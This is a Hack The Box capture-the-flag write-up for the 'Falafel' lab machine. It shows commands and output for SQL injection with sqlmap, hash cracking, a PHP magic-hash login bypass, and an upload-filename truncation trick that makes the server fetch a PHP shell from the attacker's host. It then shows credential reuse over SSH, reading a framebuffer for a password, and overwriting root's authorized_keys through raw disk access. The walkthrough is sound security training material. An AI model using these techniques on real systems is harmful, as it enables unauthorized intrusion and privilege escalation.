Falafel write-up

Ανάλυση του Falafel

· Cybersecurity Κυβερνοασφάλεια · hackthebox hackthebox linux linux

Enumeration

Port scanning

Let’s scan the full range of TCP ports using my tool htbscan.py (you can find it here: https://github.com/Alamot/code-snippets/blob/master/enum/htbscan.py).

$ sudo htbscan.py 10.10.10.73 200

Running command: sudo masscan -e tun0 -p0-65535 --max-rate 200 --interactive 10.10.10.73

Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2018-06-23 08:46:46 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
rate:  0.20-kpps, 22.83% done,   0:07:18 remaining, found=0          
Discovered open port 22/tcp on 10.10.10.73                                     
Discovered open port 80/tcp on 10.10.10.73                                     

Running command: sudo nmap -A -p22,80 10.10.10.73

Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-23 11:59 EEST
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Nmap scan report for falafel.htb (10.10.10.73)
Host is up (0.11s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 36:c0:0a:26:43:f8:ce:a8:2c:0d:19:21:10:a6:a8:e7 (RSA)
|   256 cb:20:fd:ff:a8:80:f2:a2:4b:2b:bb:e1:76:98:d0:fb (ECDSA)
|_  256 c4:79:2b:b6:a9:b7:17:4c:07:40:f3:e5:7c:1a:e9:dd (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/*.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Falafel Lovers
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), ASUS RT-N56U WAP (Linux 3.4) (94%), Linux 3.12 (94%), Linux 3.13 (94%), Linux 3.8 - 3.11 (94%), Linux 4.4 (94%), Linux 4.8 (94%), Linux 4.9 (94%), Linux 3.18 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Discovering directories and files

If we read http://10.10.10.73/robots.txt we see that there is disallow for the .txt files: 

User-agent: *
Disallow: /*.txt

Interesting. Let’s brute force them:

$ dirsearch -u http://10.10.10.73 -w /opt/DirBuster/directory-list-2.3-medium.txt -f -e txt 

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: txt | Threads: 10 | Wordlist size: 441041

Error Log: /opt/dirsearch/logs/errors-18-06-23_13-05-46.log

Target: http://10.10.10.73


[13:05:52] Starting: 
[13:05:58] 403 -  293B  - /images/
[13:05:59] 403 -  292B  - /icons/
[13:06:02] 403 -  294B  - /uploads/
[13:06:06] 403 -  293B  - /assets/
[13:06:19] 403 -  290B  - /css/
[13:06:36] 403 -  289B  - /js/
[13:07:14] 200 -   30B  - /robots.txt
[13:11:01] 200 -  804B  - /cyberlaw.txt
...

We found this http://10.10.10.73/cyberlaw.txt:

From: Falafel Network Admin (admin@falafel.htb)
Subject: URGENT!! MALICIOUS SITE TAKE OVER!
Date: November 25, 2017 3:30:58 PM PDT
To: lawyers@falafel.htb, devs@falafel.htb
Delivery-Date: Tue, 25 Nov 2017 15:31:01 -0700
Mime-Version: 1.0
X-Spam-Status: score=3.7 tests=DNS_FROM_RFC_POST, HTML_00_10, HTML_MESSAGE, HTML_SHORT_LENGTH version=3.1.7
X-Spam-Level: ***

A user named "chris" has informed me that he could log into MY account without knowing the password,
then take FULL CONTROL of the website using the image upload feature.
We got a cyber protection on the login form, and a senior php developer worked on filtering the URL of the upload,
so I have no idea how he did it.

Dear lawyers, please handle him. I believe Cyberlaw is on our side.
Dear develpors, fix this broken site ASAP.

    ~admin

SQL Injection

There is an SQL injection on http://10.10.10.73/login.php :

$ sqlmap -u http://10.10.10.73/login.php --dbms=MySQL --method=POST --data="username=x&password=y" --random-agent --risk=3 --level=5 -p username --text-only --string "Wrong identification : admin"

+----+----------+----------------------------------+--------+
| ID | username | password                         | role   |
+----+----------+----------------------------------+--------+
|  1 | admin    | 0e462096931906507119562988736854 | admin  |
|  2 | chris    | d4ee02a22fc872e36d9e3751ba72ddc8 | normal |
+----+----------+----------------------------------+--------+

We can reverse the chris’ hash using hashcat and rockyou.txt:

$ hashcat -m 0 d4ee02a22fc872e36d9e3751ba72ddc8 /usr/share/dict/rockyou.txt

d4ee02a22fc872e36d9e3751ba72ddc8:juggling

You can login on the website using these credentials (chris:juggling). We have several hints all about juggling…

(Well, in reality, I neved passed from this stage. I went straight for the PHP type juggling. But some guys kept asking me if I had found and/or managed to exploit the sqli. And I was like “What sqli?”… lol).

PHP type juggling and Magic hashes

Read this: https://www.owasp.org/images/6/6b/PHPMagicTricks-TypeJuggling.pdf

Now, have a look at this: 

$ echo -n 240610708 | md5sum
0e462097431906509019562988736854  -
$ echo -n QNKCDZO | md5sum
0e830400451993494058024219903391  -
$ echo -n aabg7XSs | md5sum
0e087386482136013740957780965295  -

All those hashes start with 0e. During comparison PHP will attempt to convert the string to a number then perform a numeric comparison. Comparison operators should be -by definition- extremely boring and those “magic” operators like == in PHP (and in some other languages) should never have existed in the first place. But PHP just happens to be a bit more magical ;).

Now, just use the credentials admin:240610708 to login on the website.

Getting Shell

The upload form has some extension check. We can bypass it using the double extension technique (.php.png) and a long filename in order for the second extension (.png) to be truncated in the code: 

POST /upload.php HTTP/1.1
Host: falafel.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://falafel.htb/upload.php
Cookie: PHPSESSID=goi4pf4aqrm3j3ocf6pogo4tq7
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 264

url=http://10.10.15.233/mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm.php.png
~~~
~~~
   <h1>Upload via url:</h1>  
     
     <div>  
         
        <h3>Upload Succsesful!</h3> 
        <div>  
        <h4>Output:</h4>  
        <pre>CMD: cd /var/www/html/uploads/0204-1952_bf738945a7681df9; wget 'http://10.10.15.233/mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm.php.png'</pre>  
        <pre>The name is too long, 240 chars total.
Trying to shorten...
New name is mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm.php.
--2018-02-04 19:52:24--  http://10.10.15.233/mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm.php.png
Connecting to 10.10.15.233:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1115 (1.1K) [image/png]
Saving to: 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm.php'

     0K .                                                     100%  104M=0s

2018-02-04 19:52:25 (104 MB/s) - 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm.php' saved [1115/1115]

So, just upload your favorite reverse php shell and setup your listener.

Getting user moshe

Let’s examine connection.php: 

$ cat connection.php
<?php
   define('DB_SERVER', 'localhost:3306');
   define('DB_USERNAME', 'moshe');
   define('DB_PASSWORD', 'falafelIsReallyTasty');
   define('DB_DATABASE', 'falafel');
   $db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
   // Check connection
   if (mysqli_connect_errno())
   {
      echo "Failed to connect to MySQL: " . mysqli_connect_error();
   }
?>

We just found some mysql credentials. But maybe those are re-used for ssh. Let’s check it:

$ ssh moshe@10.10.10.73
Password: falafelIsReallyTasty
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)
$

Getting user yossi

Let’s examine in what groups we are members. R(ecommended read about groups: https://wiki.archlinux.org/index.php/users_and_groups and https://wiki.debian.org/SystemGroups)

$ groups
moshe adm mail news voice floppy audio video games

Now, user moshe is a member of the “video” group. This means that we have access to video capture devices, 2D/3D hardware acceleration and framebuffers. If you don’t know what a framebuffer is read those: https://en.wikipedia.org/wiki/Linux_framebuffer and https://www.kernel.org/doc/Documentation/fb/framebuffer.txt.

Now, let’s search files owned by the “video” group:

$ find / -group video 2> /dev/null
/dev/fb0
/dev/dri/card0
/dev/dri/renderD128
/dev/dri/controlD64
...

Interesting… We have access to the framebuffer device /dev/fb0. We can use a tool like https://github.com/AndrewFromMelbourne/fb2png to convert it to a png picture or you can do this:

$ cat /dev/fb0 > fb0.data

Now we can open fb0.data from Gimp using a width of 784 pixels (you can find the correct width easily by playing with the sliding bar). The ssh password for yossi is revealed on the snapshot image:

$ ssh yossi@10.10.10.73
Password: MoshePlzStopHackingMe!
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)
yossi@falafel:~$

Getting root

User yossi is a member of those groups:

yossi@falafel:~$ groups
yossi adm disk cdrom dip plugdev lpadmin sambashare

Debian’s wiki says about the “disk” group:

disk: Raw access to disks. Mostly equivalent to root access.

Security implications

The group disk can be very dangerous, since hard drives in /dev/sd* and /dev/hd* can be read and written bypassing any file system and any partition, allowing a normal user to disclose, alter and destroy both the partitions and the data of such drives without root privileges. Users should never belong to this group.

We can use debugfs command to read everything and dd command to write anywhere. Let’s read /root/.ssh/authorized_keys using debugfs:

yossi@falafel:/dev/shm/.a$ debugfs -w /dev/sda1 -R "cat /root/.ssh/authorized_keys"
debugfs 1.42.13 (17-May-2015)
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDI92VC7JWv8vjFeINUryVOfzyTjNUQR+JFVDUBbFA84djurSFv5l3pY9VzM5tScL5NoSWkNeF/eCMu+Ne+fuoa5l6Q10HVqha3kgpP3TLP29TH+B+/bb5vxd0J3PJeklbR8CYQ36bkMARPEcPM901+mzDBikNfSCosJki4wLtnwPxamSAFZDlF+l0UNa8h7FEN/CP8PH62Ig8Zxi2SlD9SKFoOAXSDCP3XZlzU3n7Swgtf9B1RD5nLA/+qPUUj6SL+Qlxixb/kllwbbTFLRCA29QEamv4waHa6uHhqeAtyq7lv9lV2agdo7H9Q6s3LCSnjzr9JC2ffQSvtKUzb3/w9 root@falafel

Let’s find the block where the “/root/.ssh/authorized_keys” file resides:

yossi@falafel:/dev/shm/.a$ debugfs /dev/sda1 -R "blocks /root/.ssh/authorized_keys"
debugfs 1.42.13 (17-May-2015)
1608806

Let’s use dd to write our own public key inside /root/.ssh/authorized_keys. This command will write over (i.e. it will replace) the old data:

yossi@falafel:/dev/shm/.a$ dd if=/dev/shm/.a/my_id_rsa.pub of=/dev/sda1 seek=1608806 bs=4096 count=1
0+1 records in
0+1 records out
394 bytes copied, 0.00239741 s, 164 kB/s

Don’t forget to sync afterwards:

yossi@falafel:/dev/shm/.a$ sync

Now, let’s see if we succeeded:

yossi@falafel:/dev/shm/.a$ debugfs -w /dev/sda1 -R "cat /root/.ssh/authorized_keys"
debugfs 1.42.13 (17-May-2015)
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkqoxni226ZUH21u4/gq/W+kjRVasgG9Fm+gZCcKr2RAHLyADWz5GdFdGOCvb0+nTMxfH50l+Hf5Hq/dFeysjse1N5i9fJOW9hmzjQ9Gj26TJg94UL3TbzeBqK7SRbvKj4z1wPwYWyDeZ3qo1mH1U0Sg4iwkqpW/WR3VdeXAyUqxJ27BJfYTEgb0H1RSubqxIAu7RWOGw/nwek61No7FRfBrlXhWhEOvUlYOX+0n9n1ofFeDkiswyH27bMjGJbvsFv2erNE2oGWzguhUhZmd3ALf7z6Vq0WyASar2Y7f3uLBe7x4HvvSPyOJd4hEqYJopqe1KACzE7LoTqk6roKT0v alamot@TCOM1

Hooray! :D

ssh -i  ~/.ssh/id_rsa root@10.10.10.73
root@falafel:~#

Exploiting glibc for privilege escalation

The exploit https://www.exploit-db.com/exploits/43775/ (“glibc - ‘getcwd()’ Local Privilege Escalation” a.k.a. “RationalLove”) used to work on Falabel. Note that I had to compile it using GCC version 6.3.0 in order to make it work. But, anyway, the box has been patched now and it doesn’t work anymore at all as far as I know.

See also...

Δείτε επίσης...